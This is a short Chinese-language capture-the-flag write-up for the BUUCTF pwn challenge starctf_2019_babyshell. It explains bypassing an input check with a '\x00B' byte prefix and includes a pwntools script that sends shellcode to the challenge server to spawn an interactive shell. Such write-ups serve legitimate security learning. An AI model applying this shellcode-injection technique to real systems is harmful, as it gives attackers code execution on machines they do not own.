這里要求我們需要輸入一個SHellcode

然后進入 一個 if 比較;

只需要通過\x00繞過檢查， 同時執行我們輸入的shellcode

\x00B后面加上一個字符， 對應一個匯編語句。

所以我們可以通過\x00B\x22、\x00B\x00等等來繞過那個檢查

from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) payload = '\x00B3' + asm(shellcraft.sh()) p.sendline(payload) p.interactive()

總結

以上是生活随笔為你收集整理的BUUCTF(pwn)starctf_2019_babyshell的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。